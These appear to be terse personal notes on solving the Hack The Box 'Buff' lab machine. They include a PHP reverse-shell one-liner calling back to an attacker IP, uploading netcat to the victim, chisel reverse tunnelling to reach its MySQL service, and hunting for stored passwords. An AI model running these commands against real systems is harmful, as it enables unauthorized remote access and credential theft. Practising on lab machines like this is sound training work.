HTB buff notes
- when you see images, try downloading them and analyze the meta data.
- wget image_URL`
- exiftool image.img
- check the modification time
- php -r '$sock=fsockopen("10.10.14.8",81);exec("/bin/sh -i <&3 >&3 2>&3");'
get-content -shows what the file does
tasklist - shows all the programs
Upload nc.exe on the victim
nc.exe -zv localhost 8888
(talks to the server)
- 1.Download both linux and windows 64 versions gz
- 2.gunzip them and rename them to whatever you want.
- 3.Transfer the windows target machine (the windows file)
- 4.On Kali, gunzip the linux file and chmd +x it. start it with (if an error happens, the port is in use)
./chisel server --reverse --port 9002
- 1.On windows,
.\chisel.exe client IP:9002 R:3306:localhost:3306
Now that the tunneling is set up, we can connect to the sql serve via local host:3306
nc localhost 3306
You do want to have mySQL credentials before connecting.
look into /include for passwords
mysql -u root -p (no pass) -h 127.0.0.1
-> show databases;
use table_name; #shows columns
(you can make sure you're connected via chisel by "ss -lnpt | grep 3306")